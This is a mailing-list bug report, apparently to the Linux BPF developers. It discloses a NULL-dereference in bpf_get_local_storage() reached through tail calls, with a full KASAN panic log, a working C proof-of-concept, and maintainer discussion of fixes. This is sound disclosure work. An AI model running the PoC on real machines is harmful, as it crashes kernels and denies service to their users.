GPF in bpf_get_local_storage due to missing cgroup storage check in tail calls

Yinhao Hu

Nov 24, 2025, 4:16:14 AM
to Daniel Borkmann, bpf, dz...@hust.edu.cn, M2024...@hust.edu.cn, marti...@linux.dev, Alexei Starovoitov, Andrii Nakryiko, hust-os-ker...@googlegroups.com
Our fuzzer tool discovered a NULL pointer dereference in the
`bpf_get_local_storage()` helper function. This issue can lead to a
general protection fault when executing specific BPF program sequences
involving tail calls and Cgroup Local Storage. The verification process
for `BPF_MAP_TYPE_PROG_ARRAY` ensures that the Callee is compatible with
the map, but it fails to strictly enforce that the Caller has allocated
the necessary Cgroup Storage resources required by the Callee. If a
Caller (which does not use Cgroup Storage) tail calls into a Callee
(which does use `BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE`), the Callee runs
in a context where the storage pointer is `NULL`. The
`bpf_get_local_storage()` helper in the Callee attempts to dereference
this `NULL` storage pointer, causing a crash.

By manipulating the `BPF_MAP_TYPE_PROG_ARRAY` ownership (assigning it
first to a program that does use storage), we can bypass the initial
compatibility checks and insert a storage-using program into the array,
which can then be invoked by a non-storage-using Caller.

Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>

## Reproduction Steps

1. Setup: Create a `BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE` map and a
`BPF_MAP_TYPE_PROG_ARRAY` map.
2. Establish Owner: Load a dummy "Owner" program (Prog C) that
references both maps. This sets the `PROG_ARRAY`'s owner attributes to
expect storage usage.
3. Load Callee: Load the target program (Prog B) that uses the storage
map and calls `bpf_get_local_storage()`.
4. Load Caller: Load the malicious caller program (Prog A) that uses
the `PROG_ARRAY` but not the storage map. The verifier allows this due
to a permissive check on tail call compatibility.
5. Update Map: Insert Prog B into the `PROG_ARRAY`.
6. Trigger: Execute Prog A via `BPF_PROG_TEST_RUN`. It tail calls into
Prog B, which crashes upon accessing the missing storage.
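
The sequence above can be sketched as a small user-space model. This is only an illustration under stated assumptions: the struct and function names are hypothetical, the "cookie" field stands in for whatever identity the kernel records for a program's cgroup storage, and the rule "a program with no storage matches any owner" is the assumed shape of the permissive check, not a copy of the kernel code.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical stand-ins for kernel state; not the kernel's real types. */
struct model_prog {
    uint64_t storage_cookie;      /* 0 means "uses no cgroup storage" */
};

struct model_prog_array {
    bool     owner_set;
    uint64_t owner_cookie;        /* recorded from the first program using the map */
};

/* Assumed permissive rule: a program without storage matches any owner. */
static bool model_compatible(struct model_prog_array *map,
                             const struct model_prog *prog)
{
    if (!map->owner_set) {
        map->owner_set = true;
        map->owner_cookie = prog->storage_cookie;
        return true;
    }
    return prog->storage_cookie == map->owner_cookie ||
           prog->storage_cookie == 0;
}

/* Returns true if every step is accepted and the callee still needs
 * storage that the caller's context does not provide. */
static bool model_repro_reaches_null_storage(void)
{
    struct model_prog_array map = { 0 };
    struct model_prog prog_c = { .storage_cookie = 42 };  /* owner */
    struct model_prog prog_b = { .storage_cookie = 42 };  /* callee */
    struct model_prog prog_a = { .storage_cookie = 0 };   /* caller */

    if (!model_compatible(&map, &prog_c)) return false;   /* step 2 */
    if (!model_compatible(&map, &prog_b)) return false;   /* steps 3 and 5 */
    if (!model_compatible(&map, &prog_a)) return false;   /* step 4 */

    /* Step 6: the tail call keeps the caller's context, which has no storage. */
    return prog_a.storage_cookie == 0 && prog_b.storage_cookie != 0;
}
```

In this model every individual check passes, yet the pair (caller without storage, callee with storage) is never examined together, which is the gap the report describes.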

## KASAN Report

Running the proof of concept below on linux-next
6.18.0-rc6-next-20251121 produces the following KASAN report:

```
[ 87.795255] Oops: general protection fault, probably for
non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI
[ 87.796199] KASAN: null-ptr-deref in range
[0x0000000000000000-0x0000000000000007]
[ 87.796952] CPU: 0 UID: 0 PID: 350 Comm: poc Not tainted
6.18.0-rc6-next-20251121 #9 PREEMPT(none)
[ 87.797863] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX,
1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
[ 87.798828] RIP: 0010:bpf_get_local_storage+0x106/0x1c0
[ 87.799403] Code: 48 8d 7b 10 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85
9d 00 00 00 48 b8 00 00 00 00 00 fc ff df 48 8b 5b 10 48 89 da 48 c1 ea
03 <80> 3c 02 00 0f 85 88 00 00 00 48 8b 1b e8 58 8c b5 03 89 c5 3d ff
[ 87.801321] RSP: 0018:ffff8881042675b8 EFLAGS: 00010256
[ 87.801860] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
1ffffffff1359c34
[ 87.802583] RDX: 0000000000000000 RSI: 0000000000000000 RDI:
ffff888104267700
[ 87.803356] RBP: 0000000000000015 R08: 0000000000000001 R09:
0000000000000000
[ 87.804074] R10: ffff888113aaf000 R11: ffff888113aaf0bc R12:
ffff888104267930
[ 87.804816] R13: ffffc900005c7000 R14: ffff888104267730 R15:
ffffed10227ea641
[ 87.805563] FS: 0000000029cbc380(0000) GS:ffff8881911ff000(0000)
knlGS:0000000000000000
[ 87.806467] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 87.807080] CR2: 00000000004a0000 CR3: 000000010317f000 CR4:
0000000000750ef0
[ 87.807852] PKRU: 55555554
[ 87.808150] Call Trace:
[ 87.808447] <TASK>
[ 87.808703] bpf_prog_09b98cd0bcd009a1+0x1d/0x28
[ 87.809209] bpf_test_run+0x47b/0xcd0
[ 87.809620] ? __pfx_bpf_test_run+0x10/0x10
[ 87.810086] ? check_bytes_and_report+0xd0/0x150
[ 87.811109] ? __asan_memset+0x1f/0x40
[ 87.811544] bpf_prog_test_run_skb+0xea9/0x3570
[ 87.812059] ? __pfx_bpf_prog_test_run_skb+0x10/0x10
[ 87.813150] ? __pfx_bpf_check_uarg_tail_zero+0x10/0x10
[ 87.813733] __sys_bpf+0xac0/0x5110
[ 87.814123] ? __pfx___sys_bpf+0x10/0x10
[ 87.815056] ? kfree+0x19b/0x510
[ 87.815931] ? __sys_bpf+0x2ca1/0x5110
[ 87.816906] ? __sys_bpf+0x1b2f/0x5110
[ 87.817316] ? __pfx___sys_bpf+0x10/0x10
[ 87.818752] __x64_sys_bpf+0x74/0xc0
[ 87.819134] do_syscall_64+0x76/0x4e0
[ 87.820630] ? do_syscall_64+0xa2/0x4e0
[ 87.821606] ? do_syscall_64+0x24c/0x4e0
[ 87.822558] ? switch_fpu_return+0xf6/0x200
[ 87.823570] ? do_syscall_64+0x24c/0x4e0
[ 87.824039] ? handle_mm_fault+0x1ab/0x900
[ 87.824518] ? lock_mm_and_find_vma+0x58/0x720
[ 87.825562] ? do_user_addr_fault+0x863/0xf40
[ 87.826595] ? irqentry_exit+0x54/0x6a0
[ 87.827025] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[ 87.827716] RIP: 0033:0x41233d
[ 87.828074] Code: b3 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa
48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f
05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 c0 ff ff ff f7 d8 64 89 01 48
[ 87.830029] RSP: 002b:00007fffbf5d6be8 EFLAGS: 00000206 ORIG_RAX:
0000000000000141
[ 87.830840] RAX: ffffffffffffffda RBX: 0000000000000001 RCX:
000000000041233d
[ 87.831604] RDX: 0000000000000090 RSI: 00007fffbf5d6cd0 RDI:
000000000000000a
[ 87.832367] RBP: 00007fffbf5d6c00 R08: 00007fffbf5d6cd0 R09:
00007fffbf5d6cd0
[ 87.833149] R10: 00007fffbf5d6cd0 R11: 0000000000000206 R12:
00007fffbf5d7f08
[ 87.833975] R13: 00007fffbf5d7f18 R14: 00000000004a5f68 R15:
0000000000000001
[ 87.834744] </TASK>
[ 87.835012] Modules linked in:
[ 87.835450] ---[ end trace 0000000000000000 ]---
[ 87.835917] RIP: 0010:bpf_get_local_storage+0x106/0x1c0
[ 87.836462] Code: 48 8d 7b 10 48 89 fa 48 c1 ea 03 80 3c 02 00 0f 85
9d 00 00 00 48 b8 00 00 00 00 00 fc ff df 48 8b 5b 10 48 89 da 48 c1 ea
03 <80> 3c 02 00 0f 85 88 00 00 00 48 8b 1b e8 58 8c b5 03 89 c5 3d ff
[ 87.838321] RSP: 0018:ffff8881042675b8 EFLAGS: 00010256
[ 87.838884] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
1ffffffff1359c34
[ 87.839671] RDX: 0000000000000000 RSI: 0000000000000000 RDI:
ffff888104267700
[ 87.840415] RBP: 0000000000000015 R08: 0000000000000001 R09:
0000000000000000
[ 87.841143] R10: ffff888113aaf000 R11: ffff888113aaf0bc R12:
ffff888104267930
[ 87.841934] R13: ffffc900005c7000 R14: ffff888104267730 R15:
ffffed10227ea641
[ 87.842713] FS: 0000000029cbc380(0000) GS:ffff8881911ff000(0000)
knlGS:0000000000000000
[ 87.843547] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 87.844138] CR2: 00000000004a0000 CR3: 000000010317f000 CR4:
0000000000750ef0
[ 87.844877] PKRU: 55555554
[ 87.845181] Kernel panic - not syncing: Fatal exception in interrupt
[ 87.845984] Kernel Offset: disabled
[ 87.846339] ---[ end Kernel panic - not syncing: Fatal exception in
interrupt ]---
```
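
The faulting address in the report can be checked with a little arithmetic. The sketch below assumes the usual x86-64 generic KASAN mapping (shadow = (addr >> 3) + 0xdffffc0000000000) and 4-level paging; the helper names are illustrative. With RBX = 0 the instrumented check probes the shadow offset itself, which matches RAX and RDX in the register dump and is a non-canonical address, hence a general protection fault rather than an ordinary page fault.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed x86-64 generic KASAN parameters. */
#define MODEL_KASAN_SHADOW_SCALE_SHIFT 3
#define MODEL_KASAN_SHADOW_OFFSET      0xdffffc0000000000ULL

/* Address of the shadow byte that covers 'addr'. */
static uint64_t model_kasan_shadow_addr(uint64_t addr)
{
    return (addr >> MODEL_KASAN_SHADOW_SCALE_SHIFT) + MODEL_KASAN_SHADOW_OFFSET;
}

/* With 48-bit virtual addresses, bits 63..47 must be all zeros or all ones. */
static bool model_is_canonical_48(uint64_t addr)
{
    uint64_t top = addr >> 47;    /* the 17 most significant bits */
    return top == 0 || top == 0x1ffff;
}
```

For example, `model_kasan_shadow_addr(0)` yields the address printed in the Oops line, and `model_is_canonical_48()` rejects it, while a normal kernel pointer such as the RDI value in the dump passes.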

## Proof of Concept

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>
#include <string.h>
#include <errno.h>

#ifndef __NR_bpf
#define __NR_bpf 321
#endif

/* Each continued macro line needs a trailing backslash. */
#define BPF_MOV64_IMM(DST, IMM) \
    ((struct bpf_insn){.code = BPF_ALU64 | BPF_MOV | BPF_K, \
                       .dst_reg = DST, .imm = IMM})

/* A 64-bit immediate load occupies two instruction slots. */
#define BPF_LD_MAP_FD(DST, MAP_FD) \
    ((struct bpf_insn){.code = BPF_LD | BPF_DW | BPF_IMM, .dst_reg = DST, \
                       .src_reg = BPF_PSEUDO_MAP_FD, .imm = MAP_FD}), \
    ((struct bpf_insn){.code = 0, .imm = 0})

#define BPF_CALL_FUNC(FUNC) \
    ((struct bpf_insn){.code = BPF_JMP | BPF_CALL, .imm = FUNC})

#define BPF_EXIT_INSN() \
    ((struct bpf_insn){.code = BPF_JMP | BPF_EXIT})

static inline int sys_bpf(enum bpf_cmd cmd, union bpf_attr *attr,
                          unsigned int size) {
    return syscall(__NR_bpf, cmd, attr, size);
}

int main(void) {
    union bpf_attr attr = {};
    char log_buf[4096];
    int storage_map, prog_array, prog_a, prog_b, prog_c;

    // 1.1 Create Per-CPU Cgroup Storage Map
    struct { __u64 cgroup_inode_id; __u32 attach_type; } key = {};
    attr.map_type = BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE;
    attr.key_size = sizeof(key);
    attr.value_size = 8;
    storage_map = sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
    if (storage_map < 0) return 1;

    // 1.2 Create Prog Array
    memset(&attr, 0, sizeof(attr));
    attr.map_type = BPF_MAP_TYPE_PROG_ARRAY;
    attr.key_size = 4;
    attr.value_size = 4;
    attr.max_entries = 1;
    prog_array = sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
    if (prog_array < 0) return 1;

    // 2. Load Prog C (Dummy Owner): references both maps
    struct bpf_insn insns_c[] = {
        BPF_LD_MAP_FD(BPF_REG_1, storage_map),
        BPF_LD_MAP_FD(BPF_REG_2, prog_array),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),
    };
    memset(&attr, 0, sizeof(attr));
    attr.prog_type = BPF_PROG_TYPE_CGROUP_SKB;
    attr.insns = (unsigned long)insns_c;
    attr.insn_cnt = sizeof(insns_c) / sizeof(struct bpf_insn);
    attr.license = (unsigned long)"GPL";
    prog_c = sys_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
    if (prog_c < 0) return 1;

    // 3. Load Prog B (Callee): uses the storage map
    // attr keeps prog_type and license from the Prog C load.
    struct bpf_insn insns_b[] = {
        BPF_LD_MAP_FD(BPF_REG_1, storage_map),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_CALL_FUNC(BPF_FUNC_get_local_storage),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),
    };
    attr.insns = (unsigned long)insns_b;
    attr.insn_cnt = sizeof(insns_b) / sizeof(struct bpf_insn);
    attr.log_buf = (unsigned long)log_buf;
    attr.log_size = sizeof(log_buf);
    attr.log_level = 1;
    prog_b = sys_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
    if (prog_b < 0) return 1;

    // 4. Load Prog A (Caller): uses the prog array but not the storage map
    struct bpf_insn insns_a[] = {
        BPF_LD_MAP_FD(BPF_REG_2, prog_array),
        BPF_MOV64_IMM(BPF_REG_3, 0),
        BPF_CALL_FUNC(BPF_FUNC_tail_call),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),
    };
    attr.insns = (unsigned long)insns_a;
    attr.insn_cnt = sizeof(insns_a) / sizeof(struct bpf_insn);
    prog_a = sys_bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
    if (prog_a < 0) return 1;

    // 5. Update Prog Array: slot 0 now points at Prog B
    int key_0 = 0;
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = prog_array;
    attr.key = (unsigned long)&key_0;
    attr.value = (unsigned long)&prog_b;
    if (sys_bpf(BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)) < 0) return 1;

    // 6. Run Program A: the tail call into Prog B triggers the fault
    char data[128] = {};
    memset(&attr, 0, sizeof(attr));
    attr.test.prog_fd = prog_a;
    attr.test.data_in = (unsigned long)data;
    attr.test.data_size_in = sizeof(data);
    attr.test.repeat = 1;
    sys_bpf(BPF_PROG_TEST_RUN, &attr, sizeof(attr));

    return 0;
}
```
Attachment: config-linux-next

Alexei Starovoitov

Nov 24, 2025, 12:17:18 PM
to Yinhao Hu, Daniel Borkmann, bpf, dz...@hust.edu.cn, Kaiyan Mei, Martin KaFai Lau, Alexei Starovoitov, Andrii Nakryiko, hust-os-ker...@googlegroups.com
On Mon, Nov 24, 2025 at 1:16 AM Yinhao Hu <ddd...@hust.edu.cn> wrote:
>
> Our fuzzer tool discovered a NULL pointer dereference in the
> `bpf_get_local_storage()` helper function. This issue can lead to a
> general protection fault when executing specific BPF program sequences
> involving tail calls and Cgroup Local Storage. The verification process
> for `BPF_MAP_TYPE_PROG_ARRAY` ensures that the Callee is compatible with
> the map, but it fails to strictly enforce that the Caller has allocated
> the necessary Cgroup Storage resources required by the Callee. If a
> Caller (which does not use Cgroup Storage) tail calls into a Callee
> (which does use `BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE`), the Callee runs
> in a context where the storage pointer is `NULL`. The
> `bpf_get_local_storage()` helper in the Callee attempts to dereference
> this `NULL` storage pointer, causing a crash.

Daniel,

did you fix this exact bug already?

Amery Hung

Nov 24, 2025, 3:48:02 PM
to Yinhao Hu, Daniel Borkmann, bpf, dz...@hust.edu.cn, M2024...@hust.edu.cn, marti...@linux.dev, Alexei Starovoitov, Andrii Nakryiko, hust-os-ker...@googlegroups.com
Thanks for reporting. I tested the PoC on bpf-next and can still reproduce it.

I took a brief look at the cgroup local storage code. The problem
seems to be that bpf_get_local_storage() does not check whether a cgroup
local storage has been created. Cgroup local storage is created when a
program is attached, and prog A is never attached. The tail call into
prog B then dereferences storage that was never allocated.

Just thinking out loud: maybe an `if (storage)` check before
dereferencing would be enough? We also need to look further to see
whether there are other ways to trigger this type of bug.
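
A guarded lookup of that kind might look like the user-space sketch below. It is not the kernel helper: the types, the two-slot array, and the function name are hypothetical and only model "one storage pointer per storage type, NULL when nothing was allocated".

```c
#include <stddef.h>

#define MODEL_STORAGE_TYPES 2     /* illustrative: e.g. shared and per-CPU */

struct model_storage {
    long value;
};

/* Hypothetical run context: a slot stays NULL if storage was never allocated. */
struct model_run_ctx {
    struct model_storage *storage[MODEL_STORAGE_TYPES];
};

/* Returns a pointer to the stored value, or NULL when the slot is empty. */
static long *model_get_local_storage(struct model_run_ctx *ctx, int stype)
{
    struct model_storage *storage = ctx->storage[stype];

    if (!storage)                 /* the proposed check */
        return NULL;
    return &storage->value;
}
```

Note that with such a guard the caller has to be prepared for a NULL result, which the unguarded version never returned.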

Amery Hung

Nov 24, 2025, 5:46:02 PM
to Yinhao Hu, Daniel Borkmann, bpf, dz...@hust.edu.cn, M2024...@hust.edu.cn, marti...@linux.dev, Alexei Starovoitov, Andrii Nakryiko, hust-os-ker...@googlegroups.com
Looking at the problem a bit more, here are several solutions that I
can think of.

(1) Add an "if (!storage) return NULL;" check.
CONS: It would change the helper's return type from
RET_PTR_TO_MAP_VALUE to RET_PTR_TO_MAP_VALUE_OR_NULL, which would break
UAPI.

(2) Add a runtime check to disallow tail calls from a program that
does not use cgroup local storage to a program that does.
CONS: It adds overhead to all tail calls.

(3) Allocate and link cgroup local storage when updating the
prog_array map if the program uses one.
This is probably the most reasonable fix among the three.
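
To make option (2) concrete, here is a rough user-space sketch of such a runtime check. The struct and function names are hypothetical and do not correspond to kernel code; a `false` result models a refused tail call, where execution falls through to the instruction after the tail call in the caller.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical view of a program: does it call bpf_get_local_storage()? */
struct sketch_prog {
    bool uses_cgroup_storage;
};

/* Hypothetical run context: NULL when the caller has no storage set up. */
struct sketch_run_ctx {
    const void *storage;
};

/* Option (2): refuse the tail call if the callee needs storage the
 * current context lacks. */
static bool sketch_tail_call_allowed(const struct sketch_run_ctx *ctx,
                                     const struct sketch_prog *callee)
{
    if (callee->uses_cgroup_storage && ctx->storage == NULL)
        return false;
    return true;
}
```

The branch runs on every tail call, including the common case where neither program uses cgroup storage, which is the overhead noted under (2).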